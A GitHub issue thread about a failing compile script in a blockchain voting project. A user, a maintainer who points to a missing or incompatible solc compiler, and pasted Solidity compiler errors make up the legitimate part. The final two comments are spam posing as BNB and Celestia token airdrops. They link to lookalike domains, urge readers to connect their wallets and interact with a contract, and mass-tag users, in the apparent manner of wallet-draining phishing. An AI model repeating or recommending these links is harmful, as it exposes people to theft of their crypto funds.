### ISSUE TITLE
Error in ./compile.py

### ISSUE THREAD

**Issue by MRANASSPRO** [fernandolobato/decentralized-blockchain-voting#1]
Could you tell me what is not working here, this is the error message :

`Traceback (most recent call last):
  File "./compile.py", line 78, in <module>
    main()
  File "./compile.py", line 73, in main
    contract = format_contract(contract_json_string, contract_file_name)
  File "./compile.py", line 16, in format_contract
    contract = json.loads(contract)
  File "/usr/lib/python2.7/json/__init__.py", line 339, in loads
    return _default_decoder.decode(s)
  File "/usr/lib/python2.7/json/decoder.py", line 364, in decode
    obj, end = self.raw_decode(s, idx=_w(s, 0).end())
  File "/usr/lib/python2.7/json/decoder.py", line 382, in raw_decode
    raise ValueError("No JSON object could be decoded")
ValueError: No JSON object could be decoded
`

Thank you!

**Comment by fernandolobato** [comment]
Hey, 

The python script that I wrote to compile is essentially a wrapper over the [solc](https://solidity.readthedocs.io/en/develop/installing-solidity.html) compiler. It compiles, gets the ABI definition of the contract and places it in a useful folder.

I am pretty sure that your problem is not having the solc compiler. Please make sure you have it installed. 

You can test this by running:

`
solc --version
`

I am currently in the process of moving the project to the Truffle framework and packaging the web app as a docker container to make the experience better. Right now things are a bit hackish.

Please let me know if this fixes your problem so I can close the issue :)

Also if you could pull from master that would also help. I modified some details that could be related to your issue.

**Comment by MRANASSPRO** [comment]
thanks, 

I have installed the solc compiler, now `solc --version` gives the output : `Version: 0.4.23-develop.2018.4.19+commit.6f0fbcf8.Linux.g++`

Now I run `./compile.py` and I get the following output :
```
Warning: This is a pre-release compiler version, please do not use it in production.
contracts/SECP256K1.sol:53:13: Warning: The use of labels is deprecated. Please use "if", "switch", "for" or function calls instead.
            loop:
            ^--^
contracts/SECP256K1.sol:53:13: Warning: Jump instructions and labels are low-level EVM features that can lead to incorrect stack access. Because of that they are discouraged. Please consider using "switch", "if" or "for" statements instead.
            loop:
            ^--^
contracts/SECP256K1.sol:54:17: Warning: Jump instructions and labels are low-level EVM features that can lead to incorrect stack access. Because of that they are discouraged. Please consider using "switch", "if" or "for" statements instead.
                jumpi(end, iszero(bit))
                ^---------------------^
contracts/SECP256K1.sol:372:9: Error: Type uint256[3] memory is not implicitly convertible to expected type uint256.
        uint X = _double(PREC[0]);
        ^-----------------------^
contracts/SECP256K1.sol:373:29: Error: Invalid type for argument in function call. Invalid implicit conversion from uint256 to uint256[3] memory requested.
        PREC[1] = _addMixed(X, P);
                            ^
contracts/SECP256K1.sol:374:24: Error: Invalid type for argument in function call. Invalid implicit conversion from uint256 to uint256[3] memory requested.
        PREC[2] = _add(X, PREC[1]);
                       ^
contracts/SECP256K1.sol:375:24: Error: Invalid type for argument in function call. Invalid implicit conversion from uint256 to uint256[3] memory requested.
        PREC[3] = _add(X, PREC[2]);

```

**Comment by fernandolobato** [comment]
I see, 

This project had some specific and complex cryptographic requirements. For this I used an open source library for performing mathematic operations on the SECP256K1 curve. This code was not written by me. solidity is changing fast and what was valid one day is not valid today. I will look to see if it is this library has been updated. In the meantime you could look at the file and see against what version of the solc compiler its working and try to get that specific version. Sorry I took so long, I have been fully packed at work.

**Comment by mrpanday93** [comment]
# $BNB Airdrop: Claim Your $1000 in BNB Now!

🎉 Congratulations! You've been selected to receive a portion of the $1.5k Binance Airdrop. We're thrilled to offer you $1500 in BNB. But wait, there's more—connect now, and instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://miro.medium.com/v2/resize:fit:1400/1*57DPVRALhv45ef334fpetQ.jpeg)](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1000 in BNB! Additionally, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, take the opportunity to win up to $20,000—it's your golden chance!


Winners: @andthenwhat, @alexlinde, @defunctio, @skyrocknroll, @appsarak, @erikdw, @dnaka91

**Comment by Pappyskull1** [comment]
# Celestia Airdrop - Claim Your Free TIA Tokens Now! 

[![Celestia Banner](https://miro.medium.com/v2/resize:fit:1400/1*O0la1gfWxFHTQf1ZOoT9_Q.png)](https://www.celestianetworkl.online/)

**Don't Miss Out on Your Share of 60 Million $TIA Tokens!**  
Celestia, the revolutionary data availability network, is giving away a whopping 60 million $TIA tokens to the community! This is your chance to grab a piece of the action and secure your future in the crypto world.

*How to Claim Your Free TIA Tokens:**  
It's easy to get started and claim your free TIA tokens. Follow these simple steps:

1. **Connect Wallet:** Visit the [Celestia Airdrop page](https://www.celestianetworkl.online/) and connect your wallet.
2. **Claim:** Click the Claim button to receive your tokens.
3. **Interact:** Engage with the provided smart contract to earn additional rewards.

**Why Wait? Start Earning Today!**  
With Celestia, the sky's the limit. Don't let this opportunity slip through your fingers. Join the Celestia Airdrop now and kickstart your journey to financial freedom!tellYanze, @diop, @ameba23, @adamtache, @kingwh951, @qingg, @h0ngcha0, @moshangcheng, @ramsina20, @Fiono11, @niklasfink, @azeroz, @bitcoin777999, @binary-cipher, @raindust, @lileeei, @CoryDD, @FL03, @christy500, @mjane
